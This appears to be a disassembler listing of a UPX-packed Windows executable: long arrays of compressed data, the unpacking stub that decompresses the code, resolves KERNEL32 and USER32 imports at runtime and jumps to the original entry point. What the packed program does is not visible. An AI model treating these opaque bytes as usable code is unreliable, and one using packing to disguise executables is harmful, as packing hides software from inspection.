dd 18651FA2h, 881D1EC0h, 6448713Ah, 3F6866CEh, 26F20BC4h
dd 89AD051Fh, 0FAB700Dh, 0DA0867C8h, 0BE07BD3Dh, 105580DBh
dd 1C524F89h, 206A510Ch, 61E0C646h, 0A5E7158Bh, 10441025h
dd 4FD8209Fh, 1B3D12B9h, 51F86330h, 6891B06Dh, 607D77D4h
dd 4381B0A5h, 0ECB44282h, 0A58198F8h, 0DC888437h, 857A2167h
dd 0A37755E8h, 6E55B14h, 2F4E21Ah, 0B11D1C5Ah, 5379F12Ch
dd 85C74B60h, 573920E5h, 59284BA7h, 0D544B213h, 0EA7F98CCh
dd 0EB7B386Ch, 8DF87C05h, 0C218A340h, 88941C21h, 4003EB1Ah
dd 89E6428Eh, 92A36BB1h, 0C0BDD47h, 20684ABFh, 53DE5B67h
dd 0D37607FFh, 0CC000C9Dh, 4C8D5100h, 0C82B0424h, 2A5FC01Bh
dd 0D0F7FD0Bh, 0C48BC823h, 7240F005h, 17C18B0Ah, 59EB556Dh
dd 0AA6F8B94h, 0D8109C2Dh, 0EB7C2D8Fh, 0CB4Ch, 41FC5BB7h
dd 0D4C6DCEAh, 0C45087D4h, 0C7E60005h, 0E8FB1F6Eh, 0D0D2D6D4h
dd 0DEE2000Ah, 0E4C601D0h, 17EAEC0Ch, 0CEECFDCCh, 16DEECh
dd 0CE0C4CEh, 77ED0030h, 0C6E07D83h, 34DEEAE8h, 0E0EA0FF0h
dd 0EAD2DCCAh, 0DDEFFD37h, 0C6FCC6EFh, 136C681Bh, 76C4DE40h
dd 0D2CA402Bh, 0BA68C6C4h, 0ABB6DFFh, 0D60B7525h, 0D0C6D85Ch
dd 0DCEC50D2h, 765372ECh, 0EEC6FFF7h, 666A6203h, 0EE2C6E21h
dd 0E6D6DEC6h, 37EAEAE0h, 0FFBDFEDDh, 0DAECC8C8h, 0D6C6E2C8h
dd 0C4C40F2Ch, 0DA09D6E8h, 0FE43FEC0h, 0E4EA0F87h, 0FCFCECDAh
dd 0ECD2E6E6h, 0D0CEC4E4h, 3FDBB3DAh, 11E8CEDBh, 0CEC6E6E8h
dd 0C80ED4D2h, 0FD900FFEh, 0D45B77F2h, 0E0FEh, 0ECC078CAh
dd 85E2D8C2h, 0BDBFFF6Dh, 0B41B43h, 0ECE4E4DCh, 0FE525278h
dd 51C2D0C2h, 7FFF6FE6h, 0C80352A1h, 0EC52F8DEh, 0EAC2D2E8h
dd 0C8C6C052h, 0E0EE61D4h, 7B5BFDE8h, 270052D8h, 2370C2E2h
dd 0DCE4D2EEh, 22DADC50h, 269585FFh, 0D6FCB41Ch, 0FCDED6E0h
dd 0E49DACC0h, 0EAC80FFFh, 0CED2E6DCh, 96E0FCFCh, 5E25640Ch
dd 0D23CB418h, 1B65D0DAh, 0FB6C3B7Bh, 0CAD4E0D2h, 0B42CDA5Dh
dd 0CEE6E2C4h, 0B076CD4Ah, 0CAEAB43Fh, 4617D6D6h, 0DA8ABBC4h
dd 0A1612F6h, 0A7D4617Bh, 0B10EAE6h, 0DB0FB7Fh, 9684C6AAh
dd 0E8ACC2E6h, 0C608E0DEh, 0B1DC1079h, 0E4D05FC2h, 0E490E31Ah
dd 0EDC33896h, 60DEA076h, 0CA2AC092h, 0B56FDEE4h, 0D8206E6Fh
dd 0D4EC0600h, 3153E8D2h, 0FEB0208h, 4019008Fh, 9B224B81h
dd 9008222h, 82E797Fh, 6C012058h, 63727473h, 0E41F67C8h
dd 6D417970h, 14416970h, 0FE6E656Ch, 617DB34Fh, 65314174h
dd 70737714h, 746E6972h, 0FF907F66h, 0F00113E7h, 62B013Fh
dd 0D090620h, 281D110Fh, 6F97FF20h, 3E0E5DFFh, 8061615h
dd 3208190Fh, 660C2A49h, 3D0B6D48h, 4C290C5Eh, 0BB77FFB7h
dd 1D150C0Ah, 133D0C04h, 49160820h, 3C16170Ch, 2C0C2A06h
dd 0EEFBB6EFh, 2100707h, 64104A6Ah, 8751D5Ch, 390C5A03h
dd 0FB7FFF7Fh, 0B1D095Dh, 401B6081h, 29081017h, 8130513h
dd 1717120Bh, 0E0A0E01h, 0FF9076F6h, 34151833h, 27402E2Fh
dd 23244B41h, 50B0A45h, 0F6ED776Fh, 32B3810h, 401A1037h
dd 5E1B6533h, 0FF4D0C2Dh, 62DBB6Eh, 0B0C343Ch, 0C3E1437h
dd 0E0C4442h, 0FEDF0D43h, 70096EEEh, 15590E2Ch, 30118438h
dd 12052B12h, 0FFF63C39h, 8C7D77BBh, 191A150Bh, 19232F28h
dd 250E1E10h, 0B07680Eh, 0E412140Dh, 170FC4BFh, 4550000Ch
dd 4014CE2h, 7FF37700h, 0ED9ACF46h, 200E03Fh, 8010B01h
dd 130E1E0Ch, 17B329F5h, 100475D4h, 0BEE3003h, 96C166E9h
dd 7330402h, 9B25600Ch, 101E2D9Dh, 0CB24072Bh, 7C06E2CBh
dd 173C3264h, 501CB920h, 6CA701FCh, 1C5903F3h, 65742E1Eh
dd 1DCB7478h, 0D85DDC90h, 2304EB17h, 722ECD20h, 0B905F664h
dd 0FB61366Dh, 22230312h, 75EECE27h, 2E024017h, 41C1026h
dd 0C0B75BEEh, 4FC01673h, 636F6C65h, 632537F3h, 4FDB02B3h
dd 1B4226h, 0BCED9FC0h, 414A2332h, 1000051h, 0
dd 0FF200000h, 3 dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_AC = byte ptr -0ACh
pusha
mov esi, offset dword_406000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_407272
; ---------------------------------------------------------------------------
align 8
loc_407268: ; CODE XREF: start:loc_407279�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_40726E: ; CODE XREF: start+B6�j start+CD�j
add ebx, ebx
jnz short loc_407279
loc_407272: ; CODE XREF: start+10�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407279: ; CODE XREF: start+20�j
jb short loc_407268
mov eax, 1
loc_407280: ; CODE XREF: start+3F�j start+4A�j
add ebx, ebx
jnz short loc_40728B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40728B: ; CODE XREF: start+32�j
adc eax, eax
add ebx, ebx
jnb short loc_407280
jnz short loc_40729C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_407280
loc_40729C: ; CODE XREF: start+41�j
xor ecx, ecx
sub eax, 3
jb short loc_4072B0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_407322
mov ebp, eax
loc_4072B0: ; CODE XREF: start+51�j
add ebx, ebx
jnz short loc_4072BB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4072BB: ; CODE XREF: start+62�j
adc ecx, ecx
add ebx, ebx
jnz short loc_4072C8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4072C8: ; CODE XREF: start+6F�j
adc ecx, ecx
jnz short loc_4072EC
inc ecx
loc_4072CD: ; CODE XREF: start+8C�j start+97�j
add ebx, ebx
jnz short loc_4072D8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4072D8: ; CODE XREF: start+7F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_4072CD
jnz short loc_4072E9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4072CD
loc_4072E9: ; CODE XREF: start+8E�j
add ecx, 2
loc_4072EC: ; CODE XREF: start+7A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40730C
loc_4072FD: ; CODE XREF: start+B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_4072FD
jmp loc_40726E
; ---------------------------------------------------------------------------
align 4
loc_40730C: ; CODE XREF: start+AB�j start+C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40730C
add edi, ecx
jmp loc_40726E
; ---------------------------------------------------------------------------
loc_407322: ; CODE XREF: start+5C�j
pop esi
mov edi, esi
mov ecx, 9Fh
loc_40732A: ; CODE XREF: start+E1�j start+E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40732F: ; CODE XREF: start+104�j
cmp al, 1
ja short loc_40732A
cmp byte ptr [edi], 1
jnz short loc_40732A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_40732F
lea edi, [esi+5000h]
loc_40735C: ; CODE XREF: start+12E�j
mov eax, [edi]
or eax, eax
jz short loc_40739E
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+703Ch]
xchg eax, ebp
loc_407379: ; CODE XREF: start+146�j
mov al, [edi]
inc edi
or al, al
jz short loc_40735C
mov ecx, edi
push edi
dec eax
repne scasb
push ebp
call dword ptr [esi+7040h]
or eax, eax
jz short loc_407398
mov [ebx], eax
add ebx, 4
jmp short loc_407379
; ---------------------------------------------------------------------------
loc_407398: ; CODE XREF: start+13F�j
call dword ptr [esi+7048h]
loc_40739E: ; CODE XREF: start+110�j
add edi, 4
lea ebx, [esi-4]
loc_4073A4: ; CODE XREF: start+170�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_4073CF
cmp al, 0EFh
ja short loc_4073C2
loc_4073B1: ; CODE XREF: start+17D�j
add ebx, eax
mov eax, [ebx]
xchg al, ah
rol eax, 10h
xchg al, ah
add eax, esi
mov [ebx], eax
jmp short loc_4073A4
; ---------------------------------------------------------------------------
loc_4073C2: ; CODE XREF: start+15F�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
jmp short loc_4073B1
; ---------------------------------------------------------------------------
loc_4073CF: ; CODE XREF: start+15B�j
mov ebp, [esi+7044h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+1EFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp+2Ch+var_AC]
loc_407403: ; CODE XREF: start+1B7�j
push 0
cmp esp, eax
jnz short loc_407403
sub esp, 0FFFFFF80h
jmp sub_4029F5
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 408000h
dd 3 dup(0)
dd 8058h, 803Ch, 3 dup(0)
dd 8065h, 8050h, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E6169Ah, 77E75CB5h, 0
aJW db 'jw',0
align 4
aKernel32_dll db 'KERNEL32.DLL',0
aUser32_dll db 'USER32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74726956h, 506C6175h, 65746F72h, 7463h
dd 74697845h, 636F7250h, 737365h, 73770000h, 6E697270h
dd 416674h, 7000h, 0Ch, 3252h, 3CFh dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 409000h
align 2000h
_idata2 ends
end start